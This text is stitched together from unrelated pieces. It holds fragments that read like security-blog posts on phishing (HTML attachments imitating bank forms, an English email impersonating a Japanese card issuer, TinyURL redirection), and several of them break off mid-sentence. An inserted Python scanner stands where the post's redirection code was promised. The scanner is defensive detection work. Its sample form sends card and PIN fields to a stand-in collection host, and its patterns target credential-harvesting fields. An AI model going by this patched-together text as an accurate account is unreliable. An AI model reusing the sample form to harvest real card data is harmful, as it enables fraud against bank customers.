We have recently come across a different type of phishing attack that involves JavaScript being used to attempt to trick users into submitting sensitive banking-related information. This type of attack usually carries an HTML file attachment. The HTML file will locally open a look-alike bank submission form with the capability to pass critical user information to the phisher’s server.
Case 1
In the past, we monitored attacks with a similar type of file attachment, but they contained straightforward redirection code. There are different ways to redirect users to the desired location. One of the simpler pieces of HTML code for redirection is shown below:
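The following is an added example, not the redirection code from the original post: a defender-side scanner that flags the two attachment styles described above, a locally opened form that posts sensitive fields to a remote server and a meta-refresh or JavaScript redirect. The field-name patterns, the sample host and the sample field names are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
# Heuristic patterns (assumed for this example, not taken from the post).
SENSITIVE = re.compile(r"pass|pin|card|cvv|cvc|account", re.I)
JS_REDIRECT = re.compile(r"location(?:\.href)?\s*=[^=]|location\.(?:replace|assign)\s*\(")
META_URL = re.compile(r"url\s*=\s*['\"]?([^'\";\s]+)", re.I)

class AttachmentScanner(HTMLParser):
    """Collects (kind, detail) findings from an HTML mail attachment."""
    def __init__(self):
        super().__init__()
        self.findings, self._form, self._in_script = [], None, False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            # Opened from disk the page has no web origin, so an absolute
            # http(s) action means the submitted data leaves for a remote host.
            self._form = (urlparse(a.get("action", "")).hostname, [])
        elif tag == "input" and self._form:
            if a.get("type", "").lower() == "password" or SENSITIVE.search(a.get("name", "")):
                self._form[1].append(a.get("name") or "password")
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = META_URL.search(a.get("content", ""))
            if m:
                self.findings.append(("meta-refresh", m.group(1)))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form:
            host, fields = self._form
            if host and fields:  # remote target plus at least one sensitive field
                self.findings.append(("remote-form", f"{host} <- {','.join(fields)}"))
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and JS_REDIRECT.search(data):
            self.findings.append(("js-redirect", data.strip()[:60]))

def scan_attachment(html):
    scanner = AttachmentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings
# Constructed sample attachment; the host and field names are made up.
SAMPLE = ('<form method="post" action="https://collect.example.net/submit.php">'
          '<input name="card_number"><input type="password" name="pin"></form>')
print(scan_attachment(SAMPLE))
```

The name patterns are deliberately broad and will also match benign fields, so findings are best treated as a triage signal for attachments rather than a verdict.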
Symantec has recently observed an English phishing email that appears to be an official notification from a credit card company affiliated with a major Japanese bank, claiming that a limitation has been placed on the email recipient’s credit card due to a violation. The recipient is asked to provide information relevant to their account.
Last year we observed a similar phishing attempt that was trying to leverage this bank’s brand. However, that email was in the Japanese language and guided unsuspecting users to a Japanese-language phishing website. This new attack starts with an English email message, but links to a site that is written in Japanese where the recipient is asked to give up personal information such as a credit card number, credit verification value, personal identification number (PIN), and validity time. The spammers address the use of English in the email—excusing themselves for sending a message in English instead of in Japanese—...
You may or may not know about TinyURL, which is a Web service that provides short aliases for the redirection of long URLs. The TinyURL homepage includes a form that's used to submit a long URL for shortening. For each URL entered, the server adds a new alias in its hashed database and returns a shortened URL.
For example, a good use of the TinyURL service would be changing the result from a Google search for Indian wonders: